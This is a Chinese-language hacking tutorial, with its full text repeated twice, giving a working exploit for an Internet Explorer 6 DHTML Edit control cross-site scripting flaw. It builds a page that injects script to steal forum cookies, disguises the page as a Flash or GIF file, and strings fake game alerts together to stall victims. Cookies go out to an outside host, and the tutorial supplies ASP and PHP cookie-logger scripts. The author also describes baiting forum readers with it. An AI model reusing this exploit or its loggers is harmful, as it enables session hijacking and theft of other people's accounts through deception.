MSIE DHTML Edit跨站腳本漏洞
更新時間:2007年01月16日 00:00:00 作者:
微軟在去年發(fā)布了MSIE DHTML Edit控件跨站腳本漏洞,但是圈內(nèi)一直沒有公布出好用的EXP,害得一幫新手叫苦不迭,別急,這不是為大家送來了大餐嗎?!
[受影響系統(tǒng)]
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000
[漏洞描述]
Microsoft Internet Explorer DHTML edit控件不正確過濾部分數(shù)據(jù),遠程攻擊者可以利用這個漏洞進行跨站腳本攻擊,獲得敏感信息。DHTML編輯控件存在一個安全問題可被父窗口訪問,包括Script函數(shù),攻擊者使用exeScript直接注入javascript到控件,當目標用戶打開惡意鏈接時,會導致惡意腳本代碼執(zhí)行,泄露敏感信息。
看來只能影響到IE 6.0版本,并且對Windows XP SP2沒有作用,不過沒有給XP打SP2補丁的用戶不在少數(shù),這個漏洞的利用價值還是蠻大的。
由于我使用的是Windwos XP SP1正好存在這個漏洞,我們就先來測試一下吧,在本地建立如下內(nèi)容的HTML頁面:
<html>
<head>
<title>測試</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載,請稍后
++++++++++++++</b>\'');setTimeout('main()',1000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="800"
height="600"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?
action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert('等等++++++++++++++++++++++++++');
x.DOM.Script.execScript('alert(document.cookie)');
}
</SCRIPT>
</body>
</html>
用IE瀏覽器打開,如果你的系統(tǒng)存在這個漏洞,看出現(xiàn)了什么。
呵呵,彈出了我在黑防論壇上的Cookie信息。不過這個頁面利用起來很不方便,并且成功率不高,如果沒等到DHTML控件加載完畢就點擊確定,是不會彈出任何Cookie信息的。
沒等到頁面加載完畢就點擊彈出的第一個確定,一定會攻擊失敗,看來還是不足的。我們來對這個頁面進行一下補充和修改吧,使得它成為一個成功率高的偷取Cookie信息的網(wǎng)頁,好了,我們現(xiàn)在開始動手。
為了增加加載時間我們先將setTimeout('main()',1000)中的參數(shù)改大一些,就設(shè)成10000把,也就是10秒,夠長了。雖然頁面顯示著正在加載,但狀態(tài)欄中卻顯示著完畢,我們來修改狀態(tài)欄的文字,加入如下的函數(shù):
function clock() {
var title="正在裝載,請稍后++++++++++++++";
status=title;
}
為了盡可能的誘使瀏覽者去打開這個頁面,我們把它改名成.swf格式的文件,即把此頁面?zhèn)窝b成一個Flash文件。在頁面中加入:
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
同時隱藏DHTML控件,即將DHTML空間的width,height屬性設(shè)置成0。為了將Cookie發(fā)送,我們添加如下腳本:
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
這是為了測試方便,我將瀏覽者的Cookie信息發(fā)送到了網(wǎng)上一個發(fā)表評論的地方了。最終的測試頁面是:
<html>
<head>
<title>測試</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載,請稍后++++++++++++++</b>\'');clock();setTimeout('main()',10000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="0"
height="0"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function clock() {
var title="正在裝載,請稍后++++++++++++++";
status=title;
}
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert("游戲名稱:神秘祭壇\n");
alert("測試通過者擁有著超人的觀察力!\n");
alert("全世界只有10個人可以全部找出!\n");
alert("相信你就是這10個人中的一員\n");
alert("祝你好運++++++++++++++++++++\n");
alert("務(wù)必在找到不同后點擊確定??!\n");
//x.DOM.Script.execScript('alert(document.cookie)');
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
}
</SCRIPT>
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
</body>
</html>
其中的/college/UploadPic/2006/8/27/2006827233410827.swf是朋友發(fā)給我的地址,把我給下了一跳,不過沒想到我卻用它來騙稿費了,呵呵。
為了測試,趕快去黑防論壇發(fā)表一篇文章,要有吸引力才行。
夠有吸引力的了吧?我猜中招的一定不少!其實我們可以把以上的攻擊文件改名成.swf,為了在論壇上傳方便(不允許swf格式),我改名為gif格式了。
由于它是利用的IE漏洞,這個頁面的地址可以在任意地方,不過注意:
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
這個函數(shù)中定義了我們要偷取瀏覽者機器中站點的Cookie信息,我設(shè)置的是黑防論壇的,大家可以換成要攻擊的論壇。同時這個頁面也要選取內(nèi)容少的頁面,最好不要帶圖片,以加快載入時間。
好,我自己就先來看看效果吧。
看來是成功了,為了不讓瀏覽者看到自己的的Cookie信息,可以把它發(fā)送到自己定制的ASP頁面,方法是在支持ASP和FSO組件的空間上建立以下頁面:
<%
testfile=Server.MapPath("cookie.txt")
cookie=Request("cookie")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&cookie& "")
thisfile.close
set fs = nothing
%>
將它命名為Cookie.asp,注意修改以下內(nèi)容:
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
改為
x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie= '+document.cookie)");
或在支持PHP的空間建立以下頁面:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: http://wwwhacker.com.cn");
這樣通過這個漏洞,我們就可以偷取到任何論壇的Cookie信息了,不管論壇做了多么安全,只要瀏覽者IE存在此漏洞,就可成功獲取別人的Cookie,這可稱得上是論壇殺手了!
[受影響系統(tǒng)]
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000
[漏洞描述]
Microsoft Internet Explorer DHTML edit控件不正確過濾部分數(shù)據(jù),遠程攻擊者可以利用這個漏洞進行跨站腳本攻擊,獲得敏感信息。DHTML編輯控件存在一個安全問題可被父窗口訪問,包括Script函數(shù),攻擊者使用exeScript直接注入javascript到控件,當目標用戶打開惡意鏈接時,會導致惡意腳本代碼執(zhí)行,泄露敏感信息。
看來只能影響到IE 6.0版本,并且對Windows XP SP2沒有作用,不過沒有給XP打SP2補丁的用戶不在少數(shù),這個漏洞的利用價值還是蠻大的。
由于我使用的是Windwos XP SP1正好存在這個漏洞,我們就先來測試一下吧,在本地建立如下內(nèi)容的HTML頁面:
<html>
<head>
<title>測試</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載,請稍后
++++++++++++++</b>\'');setTimeout('main()',1000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="800"
height="600"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?
action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert('等等++++++++++++++++++++++++++');
x.DOM.Script.execScript('alert(document.cookie)');
}
</SCRIPT>
</body>
</html>
用IE瀏覽器打開,如果你的系統(tǒng)存在這個漏洞,看出現(xiàn)了什么。
呵呵,彈出了我在黑防論壇上的Cookie信息。不過這個頁面利用起來很不方便,并且成功率不高,如果沒等到DHTML控件加載完畢就點擊確定,是不會彈出任何Cookie信息的。
沒等到頁面加載完畢就點擊彈出的第一個確定,一定會攻擊失敗,看來還是不足的。我們來對這個頁面進行一下補充和修改吧,使得它成為一個成功率高的偷取Cookie信息的網(wǎng)頁,好了,我們現(xiàn)在開始動手。
為了增加加載時間我們先將setTimeout('main()',1000)中的參數(shù)改大一些,就設(shè)成10000把,也就是10秒,夠長了。雖然頁面顯示著正在加載,但狀態(tài)欄中卻顯示著完畢,我們來修改狀態(tài)欄的文字,加入如下的函數(shù):
function clock() {
var title="正在裝載,請稍后++++++++++++++";
status=title;
}
為了盡可能的誘使瀏覽者去打開這個頁面,我們把它改名成.swf格式的文件,即把此頁面?zhèn)窝b成一個Flash文件。在頁面中加入:
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
同時隱藏DHTML控件,即將DHTML空間的width,height屬性設(shè)置成0。為了將Cookie發(fā)送,我們添加如下腳本:
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
這是為了測試方便,我將瀏覽者的Cookie信息發(fā)送到了網(wǎng)上一個發(fā)表評論的地方了。最終的測試頁面是:
<html>
<head>
<title>測試</title>
</head>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載,請稍后++++++++++++++</b>\'');clock();setTimeout('main()',10000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="0"
height="0"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
function clock() {
var title="正在裝載,請稍后++++++++++++++";
status=title;
}
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert("游戲名稱:神秘祭壇\n");
alert("測試通過者擁有著超人的觀察力!\n");
alert("全世界只有10個人可以全部找出!\n");
alert("相信你就是這10個人中的一員\n");
alert("祝你好運++++++++++++++++++++\n");
alert("務(wù)必在找到不同后點擊確定??!\n");
//x.DOM.Script.execScript('alert(document.cookie)');
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
}
</SCRIPT>
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object>
</body>
</html>
其中的/college/UploadPic/2006/8/27/2006827233410827.swf是朋友發(fā)給我的地址,把我給下了一跳,不過沒想到我卻用它來騙稿費了,呵呵。
為了測試,趕快去黑防論壇發(fā)表一篇文章,要有吸引力才行。
夠有吸引力的了吧?我猜中招的一定不少!其實我們可以把以上的攻擊文件改名成.swf,為了在論壇上傳方便(不允許swf格式),我改名為gif格式了。
由于它是利用的IE漏洞,這個頁面的地址可以在任意地方,不過注意:
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
這個函數(shù)中定義了我們要偷取瀏覽者機器中站點的Cookie信息,我設(shè)置的是黑防論壇的,大家可以換成要攻擊的論壇。同時這個頁面也要選取內(nèi)容少的頁面,最好不要帶圖片,以加快載入時間。
好,我自己就先來看看效果吧。
看來是成功了,為了不讓瀏覽者看到自己的的Cookie信息,可以把它發(fā)送到自己定制的ASP頁面,方法是在支持ASP和FSO組件的空間上建立以下頁面:
<%
testfile=Server.MapPath("cookie.txt")
cookie=Request("cookie")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&cookie& "")
thisfile.close
set fs = nothing
%>
將它命名為Cookie.asp,注意修改以下內(nèi)容:
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
改為
x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie= '+document.cookie)");
或在支持PHP的空間建立以下頁面:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: http://wwwhacker.com.cn");
這樣通過這個漏洞,我們就可以偷取到任何論壇的Cookie信息了,不管論壇做了多么安全,只要瀏覽者IE存在此漏洞,就可成功獲取別人的Cookie,這可稱得上是論壇殺手了!